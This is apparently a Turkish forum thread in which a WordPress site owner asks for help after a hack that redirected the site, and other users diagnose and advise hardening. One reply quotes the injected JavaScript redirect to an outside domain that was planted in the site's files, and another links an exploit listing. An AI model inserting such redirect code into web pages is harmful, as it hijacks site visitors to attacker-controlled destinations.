Hacklendim Yardım! / Çözüldü
-
Merhaba, www.msy.kim diye wordpress blogum var, site başka yere yönlendirilmiş yardım edebilecek var mı?
İndex değiştirilmiş, ve birkaç klasör atılmış onları silince düzeldi.
msy tarafından 06/Eki/22 09:35 tarihinde düzenlenmiştir -
sitene aşağıdaki yönlendirme kodunu eklemişler. enfold thema dosyalarını incelersen bulursun büyük ihtimalle.
<script type="text/javascript"> if (screen.width <= 1100) { window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi"; } else {window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi";} </script> <script type="text/javascript"> if (screen.width <= 1100) { window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi"; } else {window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi";} </script> <script type="text/javascript"> if (screen.width <= 1100) { window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi"; } else {window.location = "https://somenewforyou.cc/go/mfrgkzbvgi5dimbxgi";} </script> -
mrkps bunu yazdı
sitene aşağıdaki yönlendirme kodunu eklemişler. enfold thema dosyalarını incelersen bulursun büyük ihtimalle.
evet buldum tema dosyalarına falan bakıyordum bende ama orada değilmiş, index'e eklemişler bikaç farklı index atılmış onları sildim düzeldi.
(bu sürümde baya açık varmış ayrıca E-ticaret sitem için iyzico mail attı uyarı mayetinde bir sonraki sürüm gelene kadar dikkatli olun diye.)
-
Hangi açıkla yapıyorlar bende nasibimi aldım yabancı blogumda
-
https://0day.today/exploit/37964
boyle bisi var ama bu degildir herhalde
-
Wordpress için genelde brute force denerler. Server bypass yapan mass olarak basar geçer indexini. Bir kısmı exploit ile girer, eklenti zafiyeti vs.
-
wordpress'te ne bruteforce'u ya, hedefteki sitenin wordpress surumune bakarsin orada acik var mi yok mu, yoksa eklentiler tespit edilip onlarda acik aranir, olmadi temada acik var mi ona bakilir. hicbirinde yoksa, sunucunun zaafiyetleri taranir, bu nginx/apache aciklari da olabilir direkt os'in aciklari da olabilir. ya da paylasimli bir hostingdeysen hostingdeki bambaska bir yer patlatildigi icin o aradan hacklenmis olabilirsin ama %99 kullandigin pluginlerden falandir. her seyin surumunu yukseltip wordpress ile alakali dizinlerin iznini kisitla, wordpress surumunu meta'ya falan yazan ziriltilari kaldir, wp-admin dizininin url'ini degistir. security ile ilgili bi plugin vardi onla da yapilabiliyordu bu saydiklarim.